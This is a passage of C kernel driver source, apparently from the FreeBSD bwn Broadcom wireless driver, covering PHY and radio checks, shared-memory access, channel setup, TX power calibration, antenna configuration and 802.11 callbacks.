1 || phy->rf_manuf != 0x17f)) || (phy->type == BWN_PHYTYPE_B && (phy->rf_ver & 0xfff0) != 0x2050) || (phy->type == BWN_PHYTYPE_G && phy->rf_ver != 0x2050) || (phy->type == BWN_PHYTYPE_N && phy->rf_ver != 0x2055 && phy->rf_ver != 0x2056) || (phy->type == BWN_PHYTYPE_LP && phy->rf_ver != 0x2062 && phy->rf_ver != 0x2063)) goto unsupradio; return (0); unsupphy: device_printf(sc->sc_dev, "unsupported PHY (type %#x, rev %#x, " "analog %#x)\n", phy->type, phy->rev, phy->analog); return (ENXIO); unsupradio: device_printf(sc->sc_dev, "unsupported radio (manuf %#x, ver %#x, " "rev %#x)\n", phy->rf_manuf, phy->rf_ver, phy->rf_rev); return (ENXIO); } static int bwn_chiptest(struct bwn_mac *mac) { #define TESTVAL0 0x55aaaa55 #define TESTVAL1 0xaa5555aa struct bwn_softc *sc = mac->mac_sc; uint32_t v, backup; BWN_LOCK(sc); backup = bwn_shm_read_4(mac, BWN_SHARED, 0); bwn_shm_write_4(mac, BWN_SHARED, 0, TESTVAL0); if (bwn_shm_read_4(mac, BWN_SHARED, 0) != TESTVAL0) goto error; bwn_shm_write_4(mac, BWN_SHARED, 0, TESTVAL1); if (bwn_shm_read_4(mac, BWN_SHARED, 0) != TESTVAL1) goto error; bwn_shm_write_4(mac, BWN_SHARED, 0, backup); if ((siba_get_revid(sc->sc_dev) >= 3) && (siba_get_revid(sc->sc_dev) <= 10)) { BWN_WRITE_2(mac, BWN_TSF_CFP_START, 0xaaaa); BWN_WRITE_4(mac, BWN_TSF_CFP_START, 0xccccbbbb); if (BWN_READ_2(mac, BWN_TSF_CFP_START_LOW) != 0xbbbb) goto error; if (BWN_READ_2(mac, BWN_TSF_CFP_START_HIGH) != 0xcccc) goto error; } BWN_WRITE_4(mac, BWN_TSF_CFP_START, 0); v = BWN_READ_4(mac, BWN_MACCTL) | BWN_MACCTL_GMODE; if (v != (BWN_MACCTL_GMODE | BWN_MACCTL_IHR_ON)) goto error; BWN_UNLOCK(sc); return (0); error: BWN_UNLOCK(sc); device_printf(sc->sc_dev, "failed to validate the chipaccess\n"); return (ENODEV); } #define IEEE80211_CHAN_HTG (IEEE80211_CHAN_HT | IEEE80211_CHAN_G) #define IEEE80211_CHAN_HTA (IEEE80211_CHAN_HT | IEEE80211_CHAN_A) static int bwn_setup_channels(struct bwn_mac *mac, int have_bg, int have_a) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; memset(ic->ic_channels, 0, sizeof(ic->ic_channels)); ic->ic_nchans = 0; if (have_bg) bwn_addchannels(ic->ic_channels, IEEE80211_CHAN_MAX, &ic->ic_nchans, &bwn_chantable_bg, IEEE80211_CHAN_G); if (mac->mac_phy.type == BWN_PHYTYPE_N) { if (have_a) bwn_addchannels(ic->ic_channels, IEEE80211_CHAN_MAX, &ic->ic_nchans, &bwn_chantable_n, IEEE80211_CHAN_HTA); } else { if (have_a) bwn_addchannels(ic->ic_channels, IEEE80211_CHAN_MAX, &ic->ic_nchans, &bwn_chantable_a, IEEE80211_CHAN_A); } mac->mac_phy.supports_2ghz = have_bg; mac->mac_phy.supports_5ghz = have_a; return (ic->ic_nchans == 0 ? ENXIO : 0); } static uint32_t bwn_shm_read_4(struct bwn_mac *mac, uint16_t way, uint16_t offset) { uint32_t ret; BWN_ASSERT_LOCKED(mac->mac_sc); if (way == BWN_SHARED) { KASSERT((offset & 0x0001) == 0, ("%s:%d warn", __func__, __LINE__)); if (offset & 0x0003) { bwn_shm_ctlword(mac, way, offset >> 2); ret = BWN_READ_2(mac, BWN_SHM_DATA_UNALIGNED); ret <<= 16; bwn_shm_ctlword(mac, way, (offset >> 2) + 1); ret |= BWN_READ_2(mac, BWN_SHM_DATA); goto out; } offset >>= 2; } bwn_shm_ctlword(mac, way, offset); ret = BWN_READ_4(mac, BWN_SHM_DATA); out: return (ret); } static uint16_t bwn_shm_read_2(struct bwn_mac *mac, uint16_t way, uint16_t offset) { uint16_t ret; BWN_ASSERT_LOCKED(mac->mac_sc); if (way == BWN_SHARED) { KASSERT((offset & 0x0001) == 0, ("%s:%d warn", __func__, __LINE__)); if (offset & 0x0003) { bwn_shm_ctlword(mac, way, offset >> 2); ret = BWN_READ_2(mac, BWN_SHM_DATA_UNALIGNED); goto out; } offset >>= 2; } bwn_shm_ctlword(mac, way, offset); ret = BWN_READ_2(mac, BWN_SHM_DATA); out: return (ret); } static void bwn_shm_ctlword(struct bwn_mac *mac, uint16_t way, uint16_t offset) { uint32_t control; control = way; control <<= 16; control |= offset; BWN_WRITE_4(mac, BWN_SHM_CONTROL, control); } static void bwn_shm_write_4(struct bwn_mac *mac, uint16_t way, uint16_t offset, uint32_t value) { BWN_ASSERT_LOCKED(mac->mac_sc); if (way == BWN_SHARED) { KASSERT((offset & 0x0001) == 0, ("%s:%d warn", __func__, __LINE__)); if (offset & 0x0003) { bwn_shm_ctlword(mac, way, offset >> 2); BWN_WRITE_2(mac, BWN_SHM_DATA_UNALIGNED, (value >> 16) & 0xffff); bwn_shm_ctlword(mac, way, (offset >> 2) + 1); BWN_WRITE_2(mac, BWN_SHM_DATA, value & 0xffff); return; } offset >>= 2; } bwn_shm_ctlword(mac, way, offset); BWN_WRITE_4(mac, BWN_SHM_DATA, value); } static void bwn_shm_write_2(struct bwn_mac *mac, uint16_t way, uint16_t offset, uint16_t value) { BWN_ASSERT_LOCKED(mac->mac_sc); if (way == BWN_SHARED) { KASSERT((offset & 0x0001) == 0, ("%s:%d warn", __func__, __LINE__)); if (offset & 0x0003) { bwn_shm_ctlword(mac, way, offset >> 2); BWN_WRITE_2(mac, BWN_SHM_DATA_UNALIGNED, value); return; } offset >>= 2; } bwn_shm_ctlword(mac, way, offset); BWN_WRITE_2(mac, BWN_SHM_DATA, value); } static void bwn_addchan(struct ieee80211_channel *c, int freq, int flags, int ieee, int txpow) { c->ic_freq = freq; c->ic_flags = flags; c->ic_ieee = ieee; c->ic_minpower = 0; c->ic_maxpower = 2 * txpow; c->ic_maxregpower = txpow; } static void bwn_addchannels(struct ieee80211_channel chans[], int maxchans, int *nchans, const struct bwn_channelinfo *ci, int flags) { struct ieee80211_channel *c; int i; c = &chans[*nchans]; for (i = 0; i < ci->nchannels; i++) { const struct bwn_channel *hc; hc = &ci->channels[i]; if (*nchans >= maxchans) break; bwn_addchan(c, hc->freq, flags, hc->ieee, hc->maxTxPow); c++, (*nchans)++; if (flags == IEEE80211_CHAN_G || flags == IEEE80211_CHAN_HTG) { /* g channel have a separate b-only entry */ if (*nchans >= maxchans) break; c[0] = c[-1]; c[-1].ic_flags = IEEE80211_CHAN_B; c++, (*nchans)++; } if (flags == IEEE80211_CHAN_HTG) { /* HT g channel have a separate g-only entry */ if (*nchans >= maxchans) break; c[-1].ic_flags = IEEE80211_CHAN_G; c[0] = c[-1]; c[0].ic_flags &= ~IEEE80211_CHAN_HT; c[0].ic_flags |= IEEE80211_CHAN_HT20; /* HT20 */ c++, (*nchans)++; } if (flags == IEEE80211_CHAN_HTA) { /* HT a channel have a separate a-only entry */ if (*nchans >= maxchans) break; c[-1].ic_flags = IEEE80211_CHAN_A; c[0] = c[-1]; c[0].ic_flags &= ~IEEE80211_CHAN_HT; c[0].ic_flags |= IEEE80211_CHAN_HT20; /* HT20 */ c++, (*nchans)++; } } } static int bwn_phy_g_attach(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; unsigned int i; int16_t pab0, pab1, pab2; static int8_t bwn_phy_g_tssi2dbm_table[] = BWN_PHY_G_TSSI2DBM_TABLE; int8_t bg; bg = (int8_t)siba_sprom_get_tssi_bg(sc->sc_dev); pab0 = (int16_t)siba_sprom_get_pa0b0(sc->sc_dev); pab1 = (int16_t)siba_sprom_get_pa0b1(sc->sc_dev); pab2 = (int16_t)siba_sprom_get_pa0b2(sc->sc_dev); if ((siba_get_chipid(sc->sc_dev) == 0x4301) && (phy->rf_ver != 0x2050)) device_printf(sc->sc_dev, "not supported anymore\n"); pg->pg_flags = 0; if (pab0 == 0 || pab1 == 0 || pab2 == 0 || pab0 == -1 || pab1 == -1 || pab2 == -1) { pg->pg_idletssi = 52; pg->pg_tssi2dbm = bwn_phy_g_tssi2dbm_table; return (0); } pg->pg_idletssi = (bg == 0 || bg == -1) ? 62 : bg; pg->pg_tssi2dbm = (uint8_t *)malloc(64, M_DEVBUF, M_NOWAIT | M_ZERO); if (pg->pg_tssi2dbm == NULL) { device_printf(sc->sc_dev, "failed to allocate buffer\n"); return (ENOMEM); } for (i = 0; i < 64; i++) { int32_t m1, m2, f, q, delta; int8_t j = 0; m1 = BWN_TSSI2DBM(16 * pab0 + i * pab1, 32); m2 = MAX(BWN_TSSI2DBM(32768 + i * pab2, 256), 1); f = 256; do { if (j > 15) { device_printf(sc->sc_dev, "failed to generate tssi2dBm\n"); free(pg->pg_tssi2dbm, M_DEVBUF); return (ENOMEM); } q = BWN_TSSI2DBM(f * 4096 - BWN_TSSI2DBM(m2 * f, 16) * f, 2048); delta = abs(q - f); f = q; j++; } while (delta >= 2); pg->pg_tssi2dbm[i] = MIN(MAX(BWN_TSSI2DBM(m1 * f, 8192), -127), 128); } pg->pg_flags |= BWN_PHY_G_FLAG_TSSITABLE_ALLOC; return (0); } static void bwn_phy_g_detach(struct bwn_mac *mac) { struct bwn_phy_g *pg = &mac->mac_phy.phy_g; if (pg->pg_flags & BWN_PHY_G_FLAG_TSSITABLE_ALLOC) { free(pg->pg_tssi2dbm, M_DEVBUF); pg->pg_tssi2dbm = NULL; } pg->pg_flags = 0; } static void bwn_phy_g_init_pre(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; void *tssi2dbm; int idletssi; unsigned int i; tssi2dbm = pg->pg_tssi2dbm; idletssi = pg->pg_idletssi; memset(pg, 0, sizeof(*pg)); pg->pg_tssi2dbm = tssi2dbm; pg->pg_idletssi = idletssi; memset(pg->pg_minlowsig, 0xff, sizeof(pg->pg_minlowsig)); for (i = 0; i < N(pg->pg_nrssi); i++) pg->pg_nrssi[i] = -1000; for (i = 0; i < N(pg->pg_nrssi_lt); i++) pg->pg_nrssi_lt[i] = i; pg->pg_lofcal = 0xffff; pg->pg_initval = 0xffff; pg->pg_immode = BWN_IMMODE_NONE; pg->pg_ofdmtab_dir = BWN_OFDMTAB_DIR_UNKNOWN; pg->pg_avgtssi = 0xff; pg->pg_loctl.tx_bias = 0xff; TAILQ_INIT(&pg->pg_loctl.calib_list); } static int bwn_phy_g_prepare_hw(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; static const struct bwn_rfatt rfatt0[] = { { 3, 0 }, { 1, 0 }, { 5, 0 }, { 7, 0 }, { 9, 0 }, { 2, 0 }, { 0, 0 }, { 4, 0 }, { 6, 0 }, { 8, 0 }, { 1, 1 }, { 2, 1 }, { 3, 1 }, { 4, 1 } }; static const struct bwn_rfatt rfatt1[] = { { 2, 1 }, { 4, 1 }, { 6, 1 }, { 8, 1 }, { 10, 1 }, { 12, 1 }, { 14, 1 } }; static const struct bwn_rfatt rfatt2[] = { { 0, 1 }, { 2, 1 }, { 4, 1 }, { 6, 1 }, { 8, 1 }, { 9, 1 }, { 9, 1 } }; static const struct bwn_bbatt bbatt_0[] = { { 0 }, { 1 }, { 2 }, { 3 }, { 4 }, { 5 }, { 6 }, { 7 }, { 8 } }; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s fail", __func__)); if (phy->rf_ver == 0x2050 && phy->rf_rev < 6) pg->pg_bbatt.att = 0; else pg->pg_bbatt.att = 2; /* prepare Radio Attenuation */ pg->pg_rfatt.padmix = 0; if (siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BCM4309G) { if (siba_get_pci_revid(sc->sc_dev) < 0x43) { pg->pg_rfatt.att = 2; goto done; } else if (siba_get_pci_revid(sc->sc_dev) < 0x51) { pg->pg_rfatt.att = 3; goto done; } } if (phy->type == BWN_PHYTYPE_A) { pg->pg_rfatt.att = 0x60; goto done; } switch (phy->rf_ver) { case 0x2050: switch (phy->rf_rev) { case 0: pg->pg_rfatt.att = 5; goto done; case 1: if (phy->type == BWN_PHYTYPE_G) { if (siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BCM4309G && siba_get_pci_revid(sc->sc_dev) >= 30) pg->pg_rfatt.att = 3; else if (siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BU4306) pg->pg_rfatt.att = 3; else pg->pg_rfatt.att = 1; } else { if (siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BCM4309G && siba_get_pci_revid(sc->sc_dev) >= 30) pg->pg_rfatt.att = 7; else pg->pg_rfatt.att = 6; } goto done; case 2: if (phy->type == BWN_PHYTYPE_G) { if (siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BCM4309G && siba_get_pci_revid(sc->sc_dev) >= 30) pg->pg_rfatt.att = 3; else if (siba_get_pci_subvendor(sc->sc_dev) == SIBA_BOARDVENDOR_BCM && siba_get_pci_subdevice(sc->sc_dev) == SIBA_BOARD_BU4306) pg->pg_rfatt.att = 5; else if (siba_get_chipid(sc->sc_dev) == 0x4320) pg->pg_rfatt.att = 4; else pg->pg_rfatt.att = 3; } else pg->pg_rfatt.att = 6; goto done; case 3: pg->pg_rfatt.att = 5; goto done; case 4: case 5: pg->pg_rfatt.att = 1; goto done; case 6: case 7: pg->pg_rfatt.att = 5; goto done; case 8: pg->pg_rfatt.att = 0xa; pg->pg_rfatt.padmix = 1; goto done; case 9: default: pg->pg_rfatt.att = 5; goto done; } break; case 0x2053: switch (phy->rf_rev) { case 1: pg->pg_rfatt.att = 6; goto done; } break; } pg->pg_rfatt.att = 5; done: pg->pg_txctl = (bwn_phy_g_txctl(mac) << 4); if (!bwn_has_hwpctl(mac)) { lo->rfatt.array = rfatt0; lo->rfatt.len = N(rfatt0); lo->rfatt.min = 0; lo->rfatt.max = 9; goto genbbatt; } if (phy->rf_ver == 0x2050 && phy->rf_rev == 8) { lo->rfatt.array = rfatt1; lo->rfatt.len = N(rfatt1); lo->rfatt.min = 0; lo->rfatt.max = 14; goto genbbatt; } lo->rfatt.array = rfatt2; lo->rfatt.len = N(rfatt2); lo->rfatt.min = 0; lo->rfatt.max = 9; genbbatt: lo->bbatt.array = bbatt_0; lo->bbatt.len = N(bbatt_0); lo->bbatt.min = 0; lo->bbatt.max = 8; BWN_READ_4(mac, BWN_MACCTL); if (phy->rev == 1) { phy->gmode = 0; bwn_reset_core(mac, 0); bwn_phy_g_init_sub(mac); phy->gmode = 1; bwn_reset_core(mac, BWN_TGSLOW_SUPPORT_G); } return (0); } static uint16_t bwn_phy_g_txctl(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; if (phy->rf_ver != 0x2050) return (0); if (phy->rf_rev == 1) return (BWN_TXCTL_PA2DB | BWN_TXCTL_TXMIX); if (phy->rf_rev < 6) return (BWN_TXCTL_PA2DB); if (phy->rf_rev == 8) return (BWN_TXCTL_TXMIX); return (0); } static int bwn_phy_g_init(struct bwn_mac *mac) { bwn_phy_g_init_sub(mac); return (0); } static void bwn_phy_g_exit(struct bwn_mac *mac) { struct bwn_txpwr_loctl *lo = &mac->mac_phy.phy_g.pg_loctl; struct bwn_lo_calib *cal, *tmp; if (lo == NULL) return; TAILQ_FOREACH_SAFE(cal, &lo->calib_list, list, tmp) { TAILQ_REMOVE(&lo->calib_list, cal, list); free(cal, M_DEVBUF); } } static uint16_t bwn_phy_g_read(struct bwn_mac *mac, uint16_t reg) { BWN_WRITE_2(mac, BWN_PHYCTL, reg); return (BWN_READ_2(mac, BWN_PHYDATA)); } static void bwn_phy_g_write(struct bwn_mac *mac, uint16_t reg, uint16_t value) { BWN_WRITE_2(mac, BWN_PHYCTL, reg); BWN_WRITE_2(mac, BWN_PHYDATA, value); } static uint16_t bwn_phy_g_rf_read(struct bwn_mac *mac, uint16_t reg) { KASSERT(reg != 1, ("%s:%d: fail", __func__, __LINE__)); BWN_WRITE_2(mac, BWN_RFCTL, reg | 0x80); return (BWN_READ_2(mac, BWN_RFDATALO)); } static void bwn_phy_g_rf_write(struct bwn_mac *mac, uint16_t reg, uint16_t value) { KASSERT(reg != 1, ("%s:%d: fail", __func__, __LINE__)); BWN_WRITE_2(mac, BWN_RFCTL, reg); BWN_WRITE_2(mac, BWN_RFDATALO, value); } static int bwn_phy_g_hwpctl(struct bwn_mac *mac) { return (mac->mac_phy.rev >= 6); } static void bwn_phy_g_rf_onoff(struct bwn_mac *mac, int on) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; unsigned int channel; uint16_t rfover, rfoverval; if (on) { if (phy->rf_on) return; BWN_PHY_WRITE(mac, 0x15, 0x8000); BWN_PHY_WRITE(mac, 0x15, 0xcc00); BWN_PHY_WRITE(mac, 0x15, (phy->gmode ? 0xc0 : 0x0)); if (pg->pg_flags & BWN_PHY_G_FLAG_RADIOCTX_VALID) { BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, pg->pg_radioctx_over); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, pg->pg_radioctx_overval); pg->pg_flags &= ~BWN_PHY_G_FLAG_RADIOCTX_VALID; } channel = phy->chan; bwn_phy_g_switch_chan(mac, 6, 1); bwn_phy_g_switch_chan(mac, channel, 0); return; } rfover = BWN_PHY_READ(mac, BWN_PHY_RFOVER); rfoverval = BWN_PHY_READ(mac, BWN_PHY_RFOVERVAL); pg->pg_radioctx_over = rfover; pg->pg_radioctx_overval = rfoverval; pg->pg_flags |= BWN_PHY_G_FLAG_RADIOCTX_VALID; BWN_PHY_WRITE(mac, BWN_PHY_RFOVER, rfover | 0x008c); BWN_PHY_WRITE(mac, BWN_PHY_RFOVERVAL, rfoverval & 0xff73); } static int bwn_phy_g_switch_channel(struct bwn_mac *mac, uint32_t newchan) { if ((newchan < 1) || (newchan > 14)) return (EINVAL); bwn_phy_g_switch_chan(mac, newchan, 0); return (0); } static uint32_t bwn_phy_g_get_default_chan(struct bwn_mac *mac) { return (1); } static void bwn_phy_g_set_antenna(struct bwn_mac *mac, int antenna) { struct bwn_phy *phy = &mac->mac_phy; uint64_t hf; int autodiv = 0; uint16_t tmp; if (antenna == BWN_ANTAUTO0 || antenna == BWN_ANTAUTO1) autodiv = 1; hf = bwn_hf_read(mac) & ~BWN_HF_UCODE_ANTDIV_HELPER; bwn_hf_write(mac, hf); BWN_PHY_WRITE(mac, BWN_PHY_BBANDCFG, (BWN_PHY_READ(mac, BWN_PHY_BBANDCFG) & ~BWN_PHY_BBANDCFG_RXANT) | ((autodiv ? BWN_ANTAUTO1 : antenna) << BWN_PHY_BBANDCFG_RXANT_SHIFT)); if (autodiv) { tmp = BWN_PHY_READ(mac, BWN_PHY_ANTDWELL); if (antenna == BWN_ANTAUTO1) tmp &= ~BWN_PHY_ANTDWELL_AUTODIV1; else tmp |= BWN_PHY_ANTDWELL_AUTODIV1; BWN_PHY_WRITE(mac, BWN_PHY_ANTDWELL, tmp); } tmp = BWN_PHY_READ(mac, BWN_PHY_ANTWRSETT); if (autodiv) tmp |= BWN_PHY_ANTWRSETT_ARXDIV; else tmp &= ~BWN_PHY_ANTWRSETT_ARXDIV; BWN_PHY_WRITE(mac, BWN_PHY_ANTWRSETT, tmp); if (phy->rev >= 2) { BWN_PHY_WRITE(mac, BWN_PHY_OFDM61, BWN_PHY_READ(mac, BWN_PHY_OFDM61) | BWN_PHY_OFDM61_10); BWN_PHY_WRITE(mac, BWN_PHY_DIVSRCHGAINBACK, (BWN_PHY_READ(mac, BWN_PHY_DIVSRCHGAINBACK) & 0xff00) | 0x15); if (phy->rev == 2) BWN_PHY_WRITE(mac, BWN_PHY_ADIVRELATED, 8); else BWN_PHY_WRITE(mac, BWN_PHY_ADIVRELATED, (BWN_PHY_READ(mac, BWN_PHY_ADIVRELATED) & 0xff00) | 8); } if (phy->rev >= 6) BWN_PHY_WRITE(mac, BWN_PHY_OFDM9B, 0xdc); hf |= BWN_HF_UCODE_ANTDIV_HELPER; bwn_hf_write(mac, hf); } static int bwn_phy_g_im(struct bwn_mac *mac, int mode) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s: fail", __func__)); KASSERT(mode == BWN_IMMODE_NONE, ("%s: fail", __func__)); if (phy->rev == 0 || !phy->gmode) return (ENODEV); pg->pg_aci_wlan_automatic = 0; return (0); } static int bwn_phy_g_recalc_txpwr(struct bwn_mac *mac, int ignore_tssi) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; unsigned int tssi; int cck, ofdm; int power; int rfatt, bbatt; unsigned int max; KASSERT(phy->type == BWN_PHYTYPE_G, ("%s: fail", __func__)); cck = bwn_phy_shm_tssi_read(mac, BWN_SHARED_TSSI_CCK); ofdm = bwn_phy_shm_tssi_read(mac, BWN_SHARED_TSSI_OFDM_G); if (cck < 0 && ofdm < 0) { if (ignore_tssi == 0) return (BWN_TXPWR_RES_DONE); cck = 0; ofdm = 0; } tssi = (cck < 0) ? ofdm : ((ofdm < 0) ? cck : (cck + ofdm) / 2); if (pg->pg_avgtssi != 0xff) tssi = (tssi + pg->pg_avgtssi) / 2; pg->pg_avgtssi = tssi; KASSERT(tssi < BWN_TSSI_MAX, ("%s:%d: fail", __func__, __LINE__)); max = siba_sprom_get_maxpwr_bg(sc->sc_dev); if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_PACTRL) max -= 3; if (max >= 120) { device_printf(sc->sc_dev, "invalid max TX-power value\n"); max = 80; siba_sprom_set_maxpwr_bg(sc->sc_dev, max); } power = MIN(MAX((phy->txpower < 0) ? 0 : (phy->txpower << 2), 0), max) - (pg->pg_tssi2dbm[MIN(MAX(pg->pg_idletssi - pg->pg_curtssi + tssi, 0x00), 0x3f)]); if (power == 0) return (BWN_TXPWR_RES_DONE); rfatt = -((power + 7) / 8); bbatt = (-(power / 2)) - (4 * rfatt); if ((rfatt == 0) && (bbatt == 0)) return (BWN_TXPWR_RES_DONE); pg->pg_bbatt_delta = bbatt; pg->pg_rfatt_delta = rfatt; return (BWN_TXPWR_RES_NEED_ADJUST); } static void bwn_phy_g_set_txpwr(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; int rfatt, bbatt; uint8_t txctl; bwn_mac_suspend(mac); BWN_ASSERT_LOCKED(sc); bbatt = pg->pg_bbatt.att; bbatt += pg->pg_bbatt_delta; rfatt = pg->pg_rfatt.att; rfatt += pg->pg_rfatt_delta; bwn_phy_g_setatt(mac, &bbatt, &rfatt); txctl = pg->pg_txctl; if ((phy->rf_ver == 0x2050) && (phy->rf_rev == 2)) { if (rfatt <= 1) { if (txctl == 0) { txctl = BWN_TXCTL_PA2DB | BWN_TXCTL_TXMIX; rfatt += 2; bbatt += 2; } else if (siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_PACTRL) { bbatt += 4 * (rfatt - 2); rfatt = 2; } } else if (rfatt > 4 && txctl) { txctl = 0; if (bbatt < 3) { rfatt -= 3; bbatt += 2; } else { rfatt -= 2; bbatt -= 2; } } } pg->pg_txctl = txctl; bwn_phy_g_setatt(mac, &bbatt, &rfatt); pg->pg_rfatt.att = rfatt; pg->pg_bbatt.att = bbatt; DPRINTF(sc, BWN_DEBUG_TXPOW, "%s: adjust TX power\n", __func__); bwn_phy_lock(mac); bwn_rf_lock(mac); bwn_phy_g_set_txpwr_sub(mac, &pg->pg_bbatt, &pg->pg_rfatt, pg->pg_txctl); bwn_rf_unlock(mac); bwn_phy_unlock(mac); bwn_mac_enable(mac); } static void bwn_phy_g_task_15s(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_phy_g *pg = &phy->phy_g; struct bwn_softc *sc = mac->mac_sc; struct bwn_txpwr_loctl *lo = &pg->pg_loctl; unsigned long expire, now; struct bwn_lo_calib *cal, *tmp; uint8_t expired = 0; bwn_mac_suspend(mac); if (lo == NULL) goto fail; BWN_GETTIME(now); if (bwn_has_hwpctl(mac)) { expire = now - BWN_LO_PWRVEC_EXPIRE; if (time_before(lo->pwr_vec_read_time, expire)) { bwn_lo_get_powervector(mac); bwn_phy_g_dc_lookup_init(mac, 0); } goto fail; } expire = now - BWN_LO_CALIB_EXPIRE; TAILQ_FOREACH_SAFE(cal, &lo->calib_list, list, tmp) { if (!time_before(cal->calib_time, expire)) continue; if (BWN_BBATTCMP(&cal->bbatt, &pg->pg_bbatt) && BWN_RFATTCMP(&cal->rfatt, &pg->pg_rfatt)) { KASSERT(!expired, ("%s:%d: fail", __func__, __LINE__)); expired = 1; } DPRINTF(sc, BWN_DEBUG_LO, "expired BB %u RF %u %u I %d Q %d\n", cal->bbatt.att, cal->rfatt.att, cal->rfatt.padmix, cal->ctl.i, cal->ctl.q); TAILQ_REMOVE(&lo->calib_list, cal, list); free(cal, M_DEVBUF); } if (expired || TAILQ_EMPTY(&lo->calib_list)) { cal = bwn_lo_calibset(mac, &pg->pg_bbatt, &pg->pg_rfatt); if (cal == NULL) { device_printf(sc->sc_dev, "failed to recalibrate LO\n"); goto fail; } TAILQ_INSERT_TAIL(&lo->calib_list, cal, list); bwn_lo_write(mac, &cal->ctl); } fail: bwn_mac_enable(mac); } static void bwn_phy_g_task_60s(struct bwn_mac *mac) { struct bwn_phy *phy = &mac->mac_phy; struct bwn_softc *sc = mac->mac_sc; uint8_t old = phy->chan; if (!(siba_sprom_get_bf_lo(sc->sc_dev) & BWN_BFL_RSSI)) return; bwn_mac_suspend(mac); bwn_nrssi_slope_11g(mac); if ((phy->rf_ver == 0x2050) && (phy->rf_rev == 8)) { bwn_switch_channel(mac, (old >= 8) ? 1 : 13); bwn_switch_channel(mac, old); } bwn_mac_enable(mac); } static void bwn_phy_switch_analog(struct bwn_mac *mac, int on) { BWN_WRITE_2(mac, BWN_PHY0, on ? 0 : 0xf4); } static int bwn_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac = sc->sc_curmac; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || mac->mac_status < BWN_MAC_STATUS_STARTED) { ieee80211_free_node(ni); m_freem(m); return (ENETDOWN); } BWN_LOCK(sc); if (bwn_tx_isfull(sc, m)) { ieee80211_free_node(ni); m_freem(m); ifp->if_oerrors++; BWN_UNLOCK(sc); return (ENOBUFS); } if (bwn_tx_start(sc, ni, m) != 0) { if (ni != NULL) ieee80211_free_node(ni); ifp->if_oerrors++; } sc->sc_watchdog_timer = 5; BWN_UNLOCK(sc); return (0); } /* * Callback from the 802.11 layer to update the slot time * based on the current setting. We use it to notify the * firmware of ERP changes and the f/w takes care of things * like slot time and preamble. */ static void bwn_updateslot(struct ifnet *ifp) { struct bwn_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct bwn_mac *mac; BWN_LOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) { mac = (struct bwn_mac *)sc->sc_curmac; bwn_set_slot_time(mac, (ic->ic_flags & IEEE80211_F_SHSLOT) ? 9 : 20); } BWN_UNLOCK(sc); } /* * Callback from the 802.11 layer after a promiscuous mode change. * Note this interface does not check the operating mode as this * is an internal callback and we are expected to honor the current * state (e.g. this is used for setting the interface in promiscuous * mode when operating in hostap mode to do ACS). */ static void bwn_update_promisc(struct ifnet *ifp) { struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac = sc->sc_curmac; BWN_LOCK(sc); mac = sc->sc_curmac; if (mac != NULL && mac->mac_status >= BWN_MAC_STATUS_INITED) { if (ifp->if_flags & IFF_PROMISC) sc->sc_filters |= BWN_MACCTL_PROMISC; else sc->sc_filters &= ~BWN_MACCTL_PROMISC; bwn_set_opmode(mac); } BWN_UNLOCK(sc); } /* * Callback from the 802.11 layer to update WME parameters. */ static int bwn_wme_update(struct ieee80211com *ic) { struct bwn_softc *sc = ic->ic_ifp->if_softc; struct bwn_mac *mac = sc->sc_curmac; struct wmeParams *wmep; int i; BWN_LOCK(sc); mac = sc->sc_curmac; if (mac != NULL && mac->mac_status >= BWN_MAC_STATUS_INITED) { bwn_mac_suspend(mac); for (i = 0; i < N(sc->sc_wmeParams); i++) { wmep = &ic->ic_wme.wme_chanParams.cap_wmeParams[i]; bwn_wme_loadparams(mac, wmep, bwn_wme_shm_offsets[i]); } bwn_mac_enable(mac); } BWN_UNLOCK(sc); return (0); } static void bwn_scan_start(struct ieee80211com *ic) { struct ifnet *ifp = ic->ic_ifp; struct bwn_softc *sc = ifp->if_softc; struct bwn_mac *mac; 